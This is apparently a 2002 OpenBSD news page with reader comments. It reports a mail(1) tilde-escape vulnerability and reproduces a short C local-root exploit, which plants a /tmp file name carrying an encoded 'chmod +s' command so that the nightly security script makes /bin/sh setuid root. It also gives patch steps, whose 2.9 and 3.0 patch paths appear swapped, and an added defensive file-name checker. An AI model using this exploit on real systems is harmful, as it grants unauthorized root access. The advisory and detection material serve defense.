"The mail(1) program can be made to execute arbitrary code in non interactive mode. this can be exploited using cron and the system startup scripts (by any local user with no privs) a patch is and advisory is available on the
advisory
page.
the fix has also been applied to the stable branches."
There is an exploit for this in the wild, from ViPER:
Subject: 2.9 3.0 local root exploit worth posting ;)
Date: Fri, 12 Apr 2002 16:05:55 +0200 (CEST)
From: ViPER / DMRT
To: webmaster@deadly.org
CC: ghost@dmrt.net
http://www.securitydatabase.net/forum/viewtopic.php?TopicID=3935#8314
http://www.bsdaemon.be/article.php?sid=302&mode=thread&order=0
/*
* (c) 2002 venglin@freebsd.lublin.pl
*
* OpenBSD 3.0 (before 08 Apr 2002)
* /etc/security + /usr/bin/mail local root exploit
*
* Run the exploit and wait for /etc/daily executed from crontab.
* /bin/sh will be suid root next day morning.
*
* Credit goes to urbanek@openbsd.cz for discovering vulnerability.
*
*/
#include
int main(void)
{
int fd;
chdir("/tmp");
fd = open(" ~!chmod +s `perl -e 'print "5714215115657163150"'` ",
O_CREAT|O_WRONLY, 04777);
if (fd)
close(fd);
}
OpenBSD v3.0
cd /usr/src
ncftpget ftp://ftp.openbsd.org/pub/OpenBSD/patches/2.9/common/023_mail.patch
patch -p0 < 023_mail.patch
cd usr.bin/mail
make cleandir
make obj
make depend
make && make install
OpenBSD v2.9
cd /usr/src
ncftpget ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.0/common/018_mail.patch
patch -p0 < 018_mail.patch
cd usr.bin/mail
make cleandir
make obj
make depend
make && make install
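For hosts that cannot be patched right away, a small checker, added here as an example and not part of the original post or of OpenBSD: mail(1) only recognizes a tilde escape at the start of a line, so a file name has to carry a line break directly before the `~` to inject one into a report that is piped to mail(1). The function names, the 0/1/2 levels and the default directory /tmp are assumptions of this example.

```c
/* Added example, not code from the original page or from OpenBSD.
 * Function names and the 0/1/2 levels are assumptions of this example. */
#include <ctype.h>
#include <dirent.h>
#include <stdio.h>

/* 0 = clean, 1 = control characters in the name, 2 = a line break followed
 * by '~', which would begin a tilde-escape line in a report sent via mail(1). */
int classify_name(const char *name)
{
    const unsigned char *p = (const unsigned char *)name;
    int level = 0;

    for (; *p != '\0'; p++) {
        if ((*p == '\n' || *p == '\r') && p[1] == '~')
            return 2;
        if (iscntrl(*p))
            level = 1;
    }
    return level;
}

/* Scan one directory (not recursive), printing flagged names with control
 * characters shown as \ooo. Returns the count flagged, or -1 if unreadable. */
int scan_dir(const char *path)
{
    const unsigned char *p;
    struct dirent *de;
    int level, flagged = 0;
    DIR *d = opendir(path);

    if (d == NULL)
        return -1;
    while ((de = readdir(d)) != NULL) {
        if ((level = classify_name(de->d_name)) == 0)
            continue;
        flagged++;
        printf("%s: level %d: ", path, level);
        for (p = (const unsigned char *)de->d_name; *p != '\0'; p++)
            printf(iscntrl(*p) || *p == '\\' ? "\\%03o" : "%c", *p);
        putchar('\n');
    }
    closedir(d);
    return flagged;
}

int main(int argc, char **argv)
{
    return scan_dir(argc > 1 ? argv[1] : "/tmp") != 0;
}
```

The exit status is non-zero when anything is flagged or the directory cannot be read, so the check can gate a cron job; a level 2 hit on an unpatched system deserves a look at who owns the file.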
Comments
By Anonymous Coward () on
Isn’t this like the third local root exploit within 6 months. I am glad that we are getting told about each of these exploits, don’t get me wrong, but what has happened in the last couple of months to make OBSD so “vulnerable”?? Has there been less testing between releases?? OBSD’s three local root exploits in 6 months is WAY better than Redhat’s crack-of-the-week, I am just wondering if I/We are slacking on bug finding/reporting.
By Anonymous Coward () on
By Chris () on http://www.dejection.org.uk/
Just comparing OpenBSD to anything else, at least we know about this and have a fix for it, as I'm sure we wouldn't if it was an MS OS.
Follow NTbugtraq and you'll see what I mean.
I have to use both systems and I can tell you I'm a million times happier using OpenBSD on my systems!
By Anonymous Coward () on
At least it's not a remote hole.
By bengt kleberg () eleberg@cbe.ericsson.se on mailto:eleberg@cbe.ericsson.se
bengt